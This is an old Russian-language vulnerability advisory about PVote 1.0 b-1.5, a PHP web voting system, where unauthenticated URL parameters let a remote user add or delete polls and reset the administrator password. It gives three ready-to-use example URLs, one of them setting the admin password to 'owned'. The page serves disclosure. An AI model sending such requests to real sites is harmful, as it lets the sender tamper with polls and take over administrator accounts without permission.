Security Lab

Управление содержанием в PVote

Дата публикации:22.04.2002
Всего просмотров:882
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: PVote - система Web голосования, написанная в PHP для Unix и Microsoft Windows. Уязвимость позволяет удаленному нападающему добавлять/удалять Web опросы, управляя значениями URL параметров. Также возможно изменить пароль администратора.

Уязвимость найдена в PVote 1.0 b-1.5

Пример:

Добавить голосование:
http://target/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4 =bad

Удалить голосование:
http://target/pvote/del.php?pollorder=1

Изменение пароля администратора
http://isp.net/pvote/ch_info.php?newpass=owned&confirm=owned

Ссылки: Источник